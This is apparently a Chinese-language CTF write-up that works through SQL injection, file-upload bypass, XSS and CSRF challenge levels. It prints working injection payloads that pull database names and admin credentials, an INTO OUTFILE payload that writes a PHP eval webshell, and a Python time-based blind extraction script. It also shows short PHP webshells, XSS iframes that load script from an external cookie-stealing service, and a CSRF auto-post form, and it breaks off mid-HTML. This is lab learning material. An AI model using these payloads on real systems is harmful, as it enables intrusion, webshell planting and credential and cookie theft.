<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">UPDATEXML (XML_document, XPath_string, new_value); </span><br><span class="line">第一个参数：XML_document是String格式，为XML文档对象的名称，文中为Doc </span><br><span class="line">第二个参数：XPath_string (Xpath格式的字符串) </span><br><span class="line">第三个参数：new_value，String格式，替换查找到的符合条件的数据 </span><br><span class="line">作用：改变文档中符合条件的节点的值</span><br><span class="line"></span><br><span class="line">然后咱们再看看语句：</span><br><span class="line"></span><br><span class="line">http://www.XXXIII.com/a.php?id=1 and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)</span><br><span class="line"></span><br><span class="line">CONCAT(str1,str2,…)  </span><br><span class="line"></span><br><span class="line">返回结果为连接参数产生的字符串。如有任何一个参数为NULL ，则返回值为 NULL。</span><br><span class="line"></span><br><span class="line">通过查询@@version,返回版本。然后CONCAT将其字符串化。因为UPDATEXML第二个参数需要Xpath格式的字符串,所以不符合要求，然后报错。</span><br><span class="line"></span><br><span class="line">错误大概会是：</span><br><span class="line"></span><br><span class="line">ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’</span><br></pre></td></tr></table></figure>
<p>OK，既然了解了什么是UpdateXml注入，开搞：</p>
<p>简单测试，发下过滤了union及空格</p>
<p>查询库名：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&apos; and 1=(updatexml(0x3a,concat(1,(select group_concat(schema_name) from information_schema.schemata)),1))#</span><br></pre></td></tr></table></figure>
<p>查询表名：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&apos; and 1=(updatexml(0x3a,concat(1,(select table_name from information_schema.tables where table_schema=’admin’)),1))#</span><br></pre></td></tr></table></figure>
<p>查询列名：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&apos; and 1=(updatexml(0x3a,concat(1,(select column_name from information_schema.columns where table_name=&apos;admin&apos; limit 0,1)),1))#</span><br></pre></td></tr></table></figure>
<p>查询字段名：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&apos; and 1=(updatexml(0x3a,concat(1,(select group_concat(username,password) from admin.admin)),1)) #</span><br></pre></td></tr></table></figure>
<p>得到flag</p>
<h4 id="第二关：-3"><a href="#第二关：-3" class="headerlink" title="第二关："></a>第二关：</h4><p>猜测第二关要写入shell，试了下注入，果然没得到什么有用的东西，那就写入shell吧，尝试发现过滤了空格和union，空格用/**/绕过，union绕过可以用into outfile terminated by绕过：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1&apos;/**/into/**/outfile/**/&apos;/var/www/html/pass1.php&apos;/**/fields/**/terminated/**/by/**/0x3c3f70687020406576616c28245f504f53545b27636d64275d293b3f3e#</span><br></pre></td></tr></table></figure>
<p>连接菜刀成功getshell，flag在后台</p>
<h4 id="总结：-2"><a href="#总结：-2" class="headerlink" title="总结："></a>总结：</h4><p>学习了updatexml注入方式</p>
<h3 id="基于时间的盲注："><a href="#基于时间的盲注：" class="headerlink" title="基于时间的盲注："></a>基于时间的盲注：</h3><h4 id="第一关：-4"><a href="#第一关：-4" class="headerlink" title="第一关："></a>第一关：</h4><p>语句就不贴了，手注了下忘了记录，直接用sqlmap跑一下吧，跑出了管理员的MD5加密密码</p>
<p>根据刘师傅提示，有个upload.php，进去是一个上传界面，输入刚刚注入出来的密码，上传一个php文件显示换个姿势。</p>
<p>试了下00截断，改后缀都不行。用php5别名绕过了，并且给出了存储路径：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">文件/var/www/example.com/public_html/upload/20171027033920426.php5上传成功</span><br></pre></td></tr></table></figure>
<p>连接菜刀成功getshell，并且flag里有彩蛋的一部分：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">彩蛋题tips1: 不是sleep盲注，mysql版本需要小于5.6.6，特殊位置</span><br></pre></td></tr></table></figure>
<h4 id="第二关：-4"><a href="#第二关：-4" class="headerlink" title="第二关："></a>第二关：</h4><p>简单尝试发现空格和星号和%0a被过滤，本来准备用/**/绕过空格过滤看来是不行了，那就用%a0吧。</p>
<p>但是随之又出现了一个问题，构造：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">id=1&apos;%a0and%a0if(1=1,sleep(5),1)#</span><br></pre></td></tr></table></figure>
<p>的时候，下面的回显是这样的：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SELECT * FROM level2 WHERE id=&apos;1&apos;燼nd爄f(1=1,sleep(5),1)#&apos; LIMIT 0,1</span><br></pre></td></tr></table></figure>
<p>被当成宽字节来出来了，可是我又发现其实sleep函数是被执行了的，也就是语句是正确的。</p>
<p>问了下大佬，是浏览器的锅，因为编码问题，但是内部是正确执行了的</p>
<p>既然是正确的，那就开始注入吧：</p>
<p>确定数据库长度：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">id=1&apos;%a0and%a0if(length(database())=6,sleep(5),1)#		为6</span><br></pre></td></tr></table></figure>
<p>查询数据库名：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">id=1&apos;%a0and%a0if(left(database(),6)=&apos;group3&apos;,sleep(5),1)#		猜测和第一关的数据库名应该差不多，嘿嘿嘿偷个懒</span><br></pre></td></tr></table></figure>
<p>查询表名：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">id=1&apos;%a0and%a0if(left((select%a0table_name%a0from%a0information_schema.tables%a0where%a0table_schema=database()),6)=&apos;level2&apos;,sleep(5),1)#		果然表名都差不多嘿嘿嘿</span><br></pre></td></tr></table></figure>
<p>查询列名：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">id=1&apos;%a0and%a0if(left((select%a0column_name%a0from%a0information_schema.columns%a0where%a0table_name=&apos;level2&apos;%a0limit%a01,1),3)=&apos;KEY&apos;,sleep(5),1)#		这儿就需要加上limit参数，否则注入不出来，因为不止一个列，在这吃了亏</span><br></pre></td></tr></table></figure>
<p>查询字段名：</p>
<p>这个手注就麻烦了，写脚本还不熟练，写个tamper吧（命名为test.py）：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#-*- coding:utf-8 -*-</span></span><br><span class="line"><span class="keyword">from</span> lib.core.enums <span class="keyword">import</span> PRIORITY</span><br><span class="line">__priority__ = PRIORITY.LOW</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">dependencies</span><span class="params">()</span>:</span></span><br><span class="line">    <span class="keyword">pass</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">tamper</span><span class="params">(payload, **kwargs)</span>:</span></span><br><span class="line">    retVal = payload</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> payload:</span><br><span class="line">        retVal = <span class="string">""</span></span><br><span class="line">        quote, doublequote, firstspace = <span class="keyword">False</span>, <span class="keyword">False</span>, <span class="keyword">False</span></span><br><span class="line"></span><br><span class="line">        <span class="keyword">for</span> i <span class="keyword">in</span> xrange(len(payload)):</span><br><span class="line">            <span class="keyword">if</span> <span class="keyword">not</span> firstspace:</span><br><span class="line">                <span class="keyword">if</span> payload[i].isspace():</span><br><span class="line">                    firstspace = <span class="keyword">True</span></span><br><span class="line">                    retVal += <span class="string">"%a0"</span></span><br><span class="line">                    <span class="keyword">continue</span></span><br><span class="line"></span><br><span class="line">            <span class="keyword">elif</span> payload[i] == <span class="string">'\''</span>:</span><br><span class="line">                quote = <span class="keyword">not</span> quote</span><br><span class="line"></span><br><span class="line">            <span class="keyword">elif</span> payload[i] == <span class="string">'"'</span>:</span><br><span class="line">                doublequote = <span class="keyword">not</span> doublequote</span><br><span class="line"></span><br><span class="line">            <span class="keyword">elif</span> payload[i] == <span class="string">" "</span> <span class="keyword">and</span> <span class="keyword">not</span> doublequote <span class="keyword">and</span> <span class="keyword">not</span> quote:</span><br><span class="line">                retVal += <span class="string">"%a0"</span></span><br><span class="line">                <span class="keyword">continue</span></span><br><span class="line"></span><br><span class="line">            retVal += payload[i]</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> retVal</span><br></pre></td></tr></table></figure>
<p>因为是post注入，所以需要抓取响应包，保存在sqlmap目录下，命名为1.txt</p>
<p>构造sqlmap语句：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -r &quot;1.txt&quot; -p id --tamper=test</span><br></pre></td></tr></table></figure>
<p>但是发现KEY跑不出来，还是老老实实写个py脚本吧：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -*- coding:utf-8 -*-</span></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> time</span><br><span class="line"></span><br><span class="line">url = <span class="string">'http://222.18.158.233:9090/'</span></span><br><span class="line"></span><br><span class="line">pwd = <span class="string">''</span></span><br><span class="line"><span class="keyword">for</span> j <span class="keyword">in</span> range(<span class="number">1</span>,<span class="number">17</span>):</span><br><span class="line">	<span class="keyword">for</span> g <span class="keyword">in</span> range(<span class="number">48</span>,<span class="number">123</span>):</span><br><span class="line">		payload = &#123;<span class="string">'id'</span>:<span class="string">'1\'and+if(ascii(substr((select`KEY`from`group3`.`level2`),%d,1))=%d,sleep(5),1) #'</span> % (j,g)&#125;</span><br><span class="line">		starttime = time.time()</span><br><span class="line">		r = requests.post(url = url, data=payload)</span><br><span class="line">		endtime = time.time()</span><br><span class="line">		<span class="keyword">if</span> endtime - starttime &gt; <span class="number">4</span>:</span><br><span class="line">			pwd += chr(g)</span><br><span class="line">			<span class="keyword">break</span></span><br><span class="line">		<span class="keyword">else</span>:</span><br><span class="line">			g = g+<span class="number">1</span></span><br><span class="line">	j = j+<span class="number">1</span></span><br><span class="line"></span><br><span class="line">print(<span class="string">"%s"</span>%pwd)</span><br></pre></td></tr></table></figure>
<p>拿到KEY，上传绕过和上一题是一样的</p>
<p>需要注意的是：</p>
<p>sql注入时偶尔会遇到字段内容为空的情况。加个反引号就解决了</p>
<h4 id="彩蛋题："><a href="#彩蛋题：" class="headerlink" title="彩蛋题："></a>彩蛋题：</h4><p>有提示：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">师傅，分页的时候会出现注入吗？</span><br></pre></td></tr></table></figure>
<p>并且第一关也有tips：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">不是sleep盲注，mysql版本需要小于5.6.6，特殊位置</span><br></pre></td></tr></table></figure>
<p>emmm版本需要小于5.6.6，特殊位置，并且传入的id值在limit参数那里，limit注入无疑</p>
<p>构造语句：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">id=1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1)</span><br></pre></td></tr></table></figure>
<p>发现貌似不支持报错注入，那试试time_based：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">id=1 PROCEDURE analyse((select extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1) = 5, BENCHMARK(5000000,SHA1(1)),1))))),1)</span><br></pre></td></tr></table></figure>
<p>成功延时！但是我测试发现不能用sleep（废话，都说了不是sleep盲注了），只能用benchmark，既然知道了原理，那开搞吧</p>
<p>查询数据库：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">id=1 PROCEDURE analyse((select extractvalue(rand(),concat(0x3a,(IF(MID(database(),1,6) = &apos;group3&apos;, BENCHMARK(5000000,SHA1(1)),1))))),1)</span><br></pre></td></tr></table></figure>
<p>查询表名：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">id=1 PROCEDURE analyse((select extractvalue(rand(),concat(0x3a,(IF(MID((select table_name from information_schema.tables where table_schema=database()),1,6) = &apos;level3&apos;, BENCHMARK(5000000,SHA1(1)),1))))),1)</span><br></pre></td></tr></table></figure>
<p>查询列名：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">id=1 PROCEDURE analyse((select extractvalue(rand(),concat(0x3a,(IF(MID((select column_name from information_schema.columns where table_name=&apos;level3&apos; limit 1,1),1,4) = &apos;flag&apos;, BENCHMARK(5000000,SHA1(1)),1))))),1)</span><br></pre></td></tr></table></figure>
<p>发现不行，等会去问问师傅</p>
<p>查询flag字段，还是上脚本吧，用原来的脚本改一下就好，改下url，将payload改为：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">payload = &#123;&apos;id&apos;:&apos;1 procedure analyse((select extractvalue(rand(),concat(0x3a,(if(ascii(mid((select flag from group3.level3),%d,1)) = %d, benchmark(5000000,SHA1(1)),1))))),1)&apos; % (j,g)&#125;</span><br></pre></td></tr></table></figure>
<p>得到flag：2712a55324be9a15</p>
<p>给了提示：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(preg_match(./.+\.ph(p[<span class="number">3457</span>]?|t|tml)$/<span class="string">',$filename))&#123;</span></span><br><span class="line"><span class="string">  die("hack me?my big brother is localguy");</span></span><br><span class="line"><span class="string">&#125;else&#123;</span></span><br><span class="line"><span class="string">  $f = fopen($filepath, '</span>w<span class="string">');</span></span><br><span class="line"><span class="string">  fwrite($f, $content);</span></span><br><span class="line"><span class="string">  fclose($f);</span></span><br><span class="line"><span class="string">  echo "upload success:upload/$filename";</span></span><br><span class="line"><span class="string">&#125;</span></span><br></pre></td></tr></table></figure>
<p>看来是需要绕过这个正则了，并且上传的内容长度限制在22个字符，这个好办，用如下php木马就行：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?</span>=<span class="keyword">eval</span>($_POST[<span class="number">0</span>]);<span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>但是刘师傅在群里说过没开短标签，所以这个不行</p>
<p>正则匹配的有：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">php,php3,php4,php5,php7,pht,phtml</span><br></pre></td></tr></table></figure>
<p>推测是apache解析漏洞利用</p>
<p>php6，.php.xxx，00截断的后缀不行，上传后访问只能在源码看来php代码，被当作文本文件执行了，试了很多都不行，难道不是apache解析漏洞？赶紧找大佬py一波，果然不是apache解析漏洞，是文件路径解析漏洞</p>
<h3 id="文件上传："><a href="#文件上传：" class="headerlink" title="文件上传："></a>文件上传：</h3><h4 id="第一关：-5"><a href="#第一关：-5" class="headerlink" title="第一关："></a>第一关：</h4><p>随便上传一张图片，发现会回显出上传路径。如果是上传一个非图片文件，会显示Invalid file。</p>
<p>直接将php文件的后缀改为.jpg试试，发现不可以。那就只能在一张正常图片里加入木马了：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">copy 1.jpg/b+1.php/a 2.jpg</span><br></pre></td></tr></table></figure>
<p>上传后连接菜刀不成功</p>
<p>经过多次测试，发现应该是检测了文件头，在一句话木马前加入图片文件头就OK了：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">GIF89a<span class="meta">&lt;?php</span> phpinfo(); <span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>附上几种文件头：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">（1） .JPEG;.JPE;.JPG，”JPGGraphic File”</span><br><span class="line">（2） .gif，”GIF 89A”</span><br><span class="line">（3） .zip，”Zip Compressed”</span><br><span class="line">（4） .doc;.xls;.xlt;.ppt;.apr，”MS Compound Document v1 or Lotus Approach APRfile”</span><br></pre></td></tr></table></figure>
<p>另外Content-Type: 也需要改成图片格式，例如：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Content-Type: image/gif</span><br></pre></td></tr></table></figure>
<p>最后上传的时候抓包，在php一句话木马后面加上.jpg</p>
<p>发包，连接菜刀，成功getshell</p>
<h4 id="第二关：-5"><a href="#第二关：-5" class="headerlink" title="第二关："></a>第二关：</h4><p>尝试了下，检测了文件头以及Content-Type</p>
<p>本来是想上传一个.htaccess文件进行重写解析规则绕过：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;FilesMatch &quot;67.gif&quot;&gt;</span><br><span class="line"></span><br><span class="line">SetHandler application/x-httpd-php</span><br><span class="line">&lt;/FilesMatch&gt;</span><br></pre></td></tr></table></figure>
<p>然后上传一个67.gif会被当作php文件解析</p>
<p>但是发现会被重命名，所以这条路行不通</p>
<p>同理上传.user.ini</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">auto_prepend_file=1.gif</span><br></pre></td></tr></table></figure>
<p>也行不通</p>
<p>能直接上传php或者php的其他别名文件，但是访问发现会被解析成txt文件输出</p>
<p>上传Php的话会被解析成图片，尝试了多次发现应该是非php、txt文件都会被解析成图片，而php、txt文件会被解析成txt文件</p>
<p>但是注意到一个细节，当上传php一句话木马的时候，访问得到的文本为：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">_ @<span class="keyword">eval</span>($_POST[<span class="string">'67'</span>];) <span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>前面的&lt;?php没了，有这个过滤？那试试短标签，端标签没有这个：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">GIF89a</span><br><span class="line"><span class="meta">&lt;?</span>=<span class="keyword">eval</span>($_POST[<span class="number">0</span>]);<span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>成功getshell</p>
<p>果然在源码里看到了这句：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$content = preg_replace(<span class="string">'/&lt;\?php|;\?&gt;|&lt;script|&lt;\/script&gt;/i'</span>, <span class="string">'_'</span>, $content);</span><br></pre></td></tr></table></figure>
<h3 id="XSS："><a href="#XSS：" class="headerlink" title="XSS："></a>XSS：</h3><h4 id="第一关：-6"><a href="#第一关：-6" class="headerlink" title="第一关："></a>第一关：</h4><p>进入题目以为就是直接xss弹窗，但是试了很多次，发现都不能弹，看来是要盗取管理员cookie了</p>
<p>利用网上免费的xss平台，直接盗取cookie登陆</p>
<p>进去之后还有一个坑，必须要把所有的链接都点一遍并且点back才能得到一个效果很炫酷的flag</p>
<h4 id="第二关：-6"><a href="#第二关：-6" class="headerlink" title="第二关："></a>第二关：</h4><p>提示：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">$array = [<span class="string">"*"</span>, <span class="string">"%"</span>, <span class="string">"0x"</span>, <span class="string">"&amp;"</span>, <span class="string">"|"</span>, <span class="string">"."</span>, <span class="string">"'"</span>];</span><br><span class="line"><span class="keyword">foreach</span>($array <span class="keyword">as</span> $str)&#123;</span><br><span class="line">  $content = str_replace($str, replace:<span class="string">""</span>,$content);</span><br><span class="line">&#125;</span><br><span class="line">$pattern2 = <span class="string">'/limit|or|and|union|select|hex|substr|group|where|by/i'</span>;</span><br><span class="line">$pattern3 = <span class="string">'/(style|title|script|href|img|href)/i'</span>;</span><br><span class="line">$pattern3 = <span class="string">'/(expression|on)/i'</span>;</span><br></pre></td></tr></table></figure>
<p>过滤了很多标签以及关键字，如果插入的内容里含有这些关键字，就会弹窗提示换个标签</p>
<p>试下data协议：</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">iframe</span> <span class="attr">src</span>=<span class="string">"data:text/html;base64,aHR0cDovL3hzc3B0LmNvbS9TUGxpTWo/MTUxMDY1ODM1Ng=="</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">iframe</span>&gt;</span></span><br></pre></td></tr></table></figure>
<p>因为这句话：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">data:text/html;base64,PHNjcmlwdD5hbGVydCgieHNzIik8L3NjcmlwdD4=</span><br></pre></td></tr></table></figure>
<p>和以下是等价的：</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">javascript:alert("xss")  或者  <span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="javascript">alert(<span class="string">"xss"</span>)</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br></pre></td></tr></table></figure>
<p>但是没拿到cookie，试试ojbk标签，呸是object标签</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">object</span> <span class="attr">data</span>=<span class="string">"data:text/html;base64,aHR0cDovL3hzc3B0LmNvbS9TUGxpTWo/MTUxMDY2MDg5Ng=="</span>&gt;</span><span class="tag">&lt;/<span class="name">object</span>&gt;</span></span><br></pre></td></tr></table></figure>
<p>还是没cookie</p>
<p>确实没思路了，py了一波出题人，他构造的语句是：</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">iframe</span> <span class="attr">src</span>=<span class="string">"data:text/html;base64,PHNjcmlwdCBzcmM9aHR0cDovL3QuY24vUmxmTmVsRT48L3NjcmlwdD4="</span>&gt;</span>test<span class="tag">&lt;/<span class="name">a</span>&gt;</span><span class="tag">&lt;/<span class="name">iframe</span>&gt;</span></span><br></pre></td></tr></table></figure>
<p>很迷，不清楚为啥中间要加a标签才能成功，出题人是说闭合a标签，可是吃瓜群众从右键源码里根本看不出有个a标签啊</p>
<p>测试发现用的那个免费xss平台项目里的四个url，不是每个都能用，但是第一关就是每个都能用，留着以后问问吧</p>
<h3 id="CSRF："><a href="#CSRF：" class="headerlink" title="CSRF："></a>CSRF：</h3><p>好吧终于到我们组的题目了</p>
<h4 id="第一关：-7"><a href="#第一关：-7" class="headerlink" title="第一关："></a>第一关：</h4><p>进入题目没有什么线索，查看源码发现一些奇怪的代码：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">&lt;!-- Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook!</span><br><span class="line">Ook? Ook! Ook! Ook. Ook? Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook.</span><br><span class="line">Ook. Ook. Ook. Ook. Ook? Ook. Ook? Ook! Ook. Ook? Ook! Ook. Ook! Ook. Ook!</span><br><span class="line">Ook! Ook! Ook. Ook! Ook! Ook! Ook! Ook! Ook. Ook. Ook. Ook. Ook. Ook. Ook.</span><br><span class="line">Ook! Ook. Ook. Ook. Ook! Ook. Ook! Ook! Ook! Ook! Ook! Ook. Ook! Ook! Ook!</span><br><span class="line">Ook! Ook! Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook! Ook. Ook. Ook.</span><br><span class="line">Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook!</span><br><span class="line">Ook. Ook? Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook? Ook! Ook! Ook. Ook?</span><br><span class="line">Ook! Ook! Ook! Ook! Ook! Ook! Ook? Ook. Ook? Ook! Ook. Ook? Ook! Ook! Ook!</span><br><span class="line">Ook! Ook! Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook. Ook.</span><br><span class="line">Ook! Ook. Ook! Ook. Ook? Ook.  --&gt;</span><br></pre></td></tr></table></figure>
<p>是ook加密，解密得到一个ip地址，丢到referer里面就得到flag了</p>
<h4 id="第二关：-7"><a href="#第二关：-7" class="headerlink" title="第二关："></a>第二关：</h4><p>进去是一个登陆界面，猜测是利用csrf攻击添加用户然后登陆得到flag，每次出题思路也是这样的</p>
<p>GET型：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?username=test&amp;&amp;password=test</span><br></pre></td></tr></table></figure>
<p>POST型：</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;!DOCTYPE html&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">html</span> <span class="attr">lang</span>=<span class="string">"en"</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">head</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">meta</span> <span class="attr">charset</span>=<span class="string">"UTF-8"</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">title</span>&gt;</span>404<span class="tag">&lt;/<span class="name">title</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">head</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">body</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">h1</span> <span class="attr">align</span>=<span class="string">"center"</span>&gt;</span>404<span class="tag">&lt;/<span class="name">br</span>&gt;</span>The page not found<span class="tag">&lt;/<span class="name">h1</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">form</span> <span class="attr">action</span>=<span class="string">"http://45.32.90.22:4000/Challenge_2.php"</span>; <span class="attr">id</span>=<span class="string">"test"</span> <span class="attr">method</span>=<span class="string">"POST"</span>&gt;</span></span><br><span class="line">       <span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span 